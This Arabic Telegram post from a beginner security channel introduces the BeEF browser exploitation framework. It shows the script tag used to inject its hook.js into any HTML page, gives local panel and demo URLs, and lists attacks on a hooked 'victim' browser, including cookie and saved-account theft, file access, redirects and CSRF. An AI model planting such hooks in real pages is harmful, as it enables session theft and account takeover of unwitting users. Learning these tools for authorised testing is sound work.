tgoop.com/ProjectSigma_CSFZ/107
Create:
Last Update:
Last Update:
#ملاحظة : Beef-XSS-Framework هي أداة لاختبار الاختراق على المتصفحات .. مبدأ عملها هو ربط hook المتصفح عن طريق كود جافاسكربت موجود ضمن ملف باسم hook يمكنك الوصول إليه بإضافة /hook.js بعد الرابط
http://127.0.0.1:3000/hook.js
يمكنك وضع الكود ضمن أي صفحة html بالطريقة التالية :
<script language="javascript" src="./hook.js"></script>طبعاً بدلاً من hook.js ضع الرابط كاملاً للملف حتى تتمكن الصفحة من الوصول إليه
الدخول إلى الأداة بعد التشغيل يتم عن طريق المتصفح .. بالدخول للرابط الذي سيظهر في الأسطر الأخيرة
http://127.0.0.1:3000/ui/panel
لتجربة الأداة بشكل سريع على جهازك يمكنك الدخول إلى رابط جاهز موجود ضمن الأداة للتجربة
http://127.0.0.1:3000/demos/basic.html
أو
http://127.0.0.1:3000/demos/butcher/index.html
عند الدخول إلى الرابط ستلاحظ أن جهازك قد تم ربطه hooked وظهر عنوان الآي بي في النافذة على اليسار ( وهو طبعاً في هذه الحالة 127.0.0.1 لأنك تطبقها ضمن الجهاز نفسه )
الآن يمكنك اختبار عدة ثغرات ممكنة عليه بالضغط على الip ومن ثم commands
هنا يمكنك محاولة الحصول على الcookies والدخول إلى الحسابات المحفوظة على المتصفح نفسه أو حتى يمكنك الوصول للملفات إذا كان المتصفح قديماً ومستوى حمايته ضعيف - كما يمكنك إرسال رسائل بمربعات نص alert إلى الضحية أو إعادة توجيهه إلى رابط آخر وبالتالي يمكنك بسهولة تطبيق استغلالات ثغرات CSRF
شكر خاص للأخ Mãjhøüł Æź لإيجاده طريقة التثبيت بدون مشاكل على termux
يمكنك مشاهدة الفيديو في الأعلى لفهم طريقة التثبيت بشكل أفضل
#ArMaNdO
#NullByteStream_Team
BY Project Sigma - Cyber Security From Zero
Share with your friend now:
tgoop.com/ProjectSigma_CSFZ/107